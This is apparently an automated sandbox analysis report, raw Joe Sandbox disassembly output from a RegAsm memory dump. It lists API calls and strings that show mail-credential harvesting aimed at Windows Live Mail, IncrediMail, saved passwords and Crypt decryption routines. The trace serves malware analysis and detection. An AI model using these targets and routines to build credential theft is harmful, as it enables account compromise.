                                                                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                              • String ID: salu
                                                                                                                                              • API String ID: 3691931180-4177317985
                                                                                                                                              • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                                                              • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                              • strlen.MSVCRT ref: 00443AD2
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                              • memset.MSVCRT ref: 00443B2E
                                                                                                                                              • memset.MSVCRT ref: 00443B4B
                                                                                                                                              • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                              Strings
                                                                                                                                              • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                              • Salt, xrefs: 00443BA7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpymemset$??2@??3@ByteCharCloseFreeLibraryLoadLocalMultiWidestrlenstrtoul
                                                                                                                                              • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                              • API String ID: 2976261921-2687544566
                                                                                                                                              • Opcode ID: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                              • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                              • Opcode Fuzzy Hash: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                              • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                              • memset.MSVCRT ref: 00403ECE
                                                                                                                                              • memset.MSVCRT ref: 00403EE2
                                                                                                                                              • memset.MSVCRT ref: 00403EF6
                                                                                                                                              • sprintf.MSVCRT ref: 00403F17
                                                                                                                                              • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                              • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                              • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                              Strings
                                                                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                              • API String ID: 113626815-1670831295
                                                                                                                                              • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                              • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                              • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                              • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                              APIs
                                                                                                                                              • sprintf.MSVCRT ref: 0040957B
                                                                                                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                              • sprintf.MSVCRT ref: 004095EB
                                                                                                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                              • memset.MSVCRT ref: 0040961C
                                                                                                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                              • String ID: caption$dialog_%d$menu_%d
                                                                                                                                              • API String ID: 3259144588-3822380221
                                                                                                                                              • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                              • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                              • API String ID: 1029625771-192783356
                                                                                                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                              • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                              • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                              • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                              APIs
                                                                                                                                              • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                              • strchr.MSVCRT ref: 004042F6
                                                                                                                                              • strlen.MSVCRT ref: 0040430A
                                                                                                                                              • sprintf.MSVCRT ref: 0040432B
                                                                                                                                              • strchr.MSVCRT ref: 0040433C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                                                                              • API String ID: 3866421160-4070641962
                                                                                                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                              APIs
                                                                                                                                              • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                              • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                              • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                              • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                              • memset.MSVCRT ref: 004097BD
                                                                                                                                              • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                              • API String ID: 1035899707-3647959541
                                                                                                                                              • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                              • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                              • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                              • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                              APIs
                                                                                                                                              • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy
                                                                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                              • API String ID: 714388716-318151290
                                                                                                                                              • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                              • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                              • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                              • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                              APIs
                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                              • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                              • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                              • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                              • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                              • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                              • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                              • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1416211542-0
                                                                                                                                              • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                              • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                              • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                              • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                              • API String ID: 2360744853-2229823034
                                                                                                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                              APIs
                                                                                                                                              • strchr.MSVCRT ref: 004100E4
                                                                                                                                              • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                              • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                              • memset.MSVCRT ref: 00410129
                                                                                                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                              • memset.MSVCRT ref: 00410171
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                              • _mbscat.MSVCRT ref: 00410197
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                              • String ID: \systemroot
                                                                                                                                              • API String ID: 912701516-1821301763
                                                                                                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040F84A
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                              • String ID: Creds$ps:password
                                                                                                                                              • API String ID: 313032062-1872227768
                                                                                                                                              • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                              • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                              • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                              • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                              • memset.MSVCRT ref: 0040301E
                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                              • memset.MSVCRT ref: 0040306B
                                                                                                                                              • sprintf.MSVCRT ref: 00403083
                                                                                                                                              • memset.MSVCRT ref: 004030B4
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$Close$EnumOpensprintf
                                                                                                                                              • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                              • API String ID: 3672803090-3168940695
                                                                                                                                              • Opcode ID: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                              • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                                                                                                              • Opcode Fuzzy Hash: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                              • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                              • String ID: 0$6
                                                                                                                                              • API String ID: 3540791495-3849865405
                                                                                                                                              • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                              • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                              • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                              • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                              APIs
                                                                                                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                              Strings
                                                                                                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                              • API String ID: 1640410171-2022683286
                                                                                                                                              • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                              • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                              • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                              • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                              • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                              • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
